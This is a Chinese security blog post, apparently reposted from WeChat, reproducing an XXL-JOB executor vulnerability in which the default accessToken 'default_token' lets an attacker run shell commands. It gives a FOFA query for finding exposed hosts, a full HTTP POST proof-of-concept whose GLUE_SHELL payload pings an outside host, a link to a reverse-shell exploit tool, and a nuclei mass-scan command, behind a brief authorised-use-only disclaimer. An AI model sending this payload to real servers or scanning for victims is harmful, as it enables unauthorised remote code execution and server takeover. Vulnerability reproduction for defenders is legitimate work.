漏洞复现 XXL-JOB默认accessToken身份绕过RCE漏洞
2023-11-6 14:4:29 Author: 阿乐你好(查看原文) 阅读量:108 收藏

0x01 阅读须知

融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

0x02 漏洞描述

XXL-JOB 是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。XXL-JOB 默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,从而获取服务器权限。经分析和研判,该漏洞利用难度低,可导致远程代码执行。

0x03 漏洞复现

fofa-query: "invalid request, HttpMethod not support" && port="9999" 

1.执行poc进行dnslog访问,dnslog服务器得到响应

1.pocPOST /run HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeContent-Length: 422Content-Type: application/jsonXXL-JOB-ACCESS-TOKEN: default_tokenAccept-Encoding: gzip
{ "jobId": 187270, "executorHandler": "demoJobHandler", "executorParams": "demoJobHandler", "executorBlockStrategy": "COVER_EARLY", "executorTimeout": 0, "logId": 187270, "logDateTime": 116989791110, "glueType": "GLUE_SHELL", "glueSource": "ping x.x.x.x", "glueUpdatetime": 116989791110, "broadcastIndex": 0, "broadcastTotal": 0}
2.反弹shell利用工具https://github.com/charonlight/xxl-jobExploitGUI/releases/tag/v1.0

2.nuclei验证脚本已发布于知识星球

nuclei.exe -t xxl-job-executor-default-accessToken.yaml -l subs.txt -stats

网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精,敬请期待!
👇👇👇

学历:非全日制的学历提升,高升专,专升本可学位

安全证书:cisp  cissp  cisp-pte pmp 等

 有需要的私聊


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247489677&idx=1&sn=b5cdb778bce37e23bb7d550067d6908a&chksm=979a37c5a0edbed30ac6fb024ca4cfb9e6fc43881c4f3fc1fd4744cfdddd30fb1da7c5c070dd&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh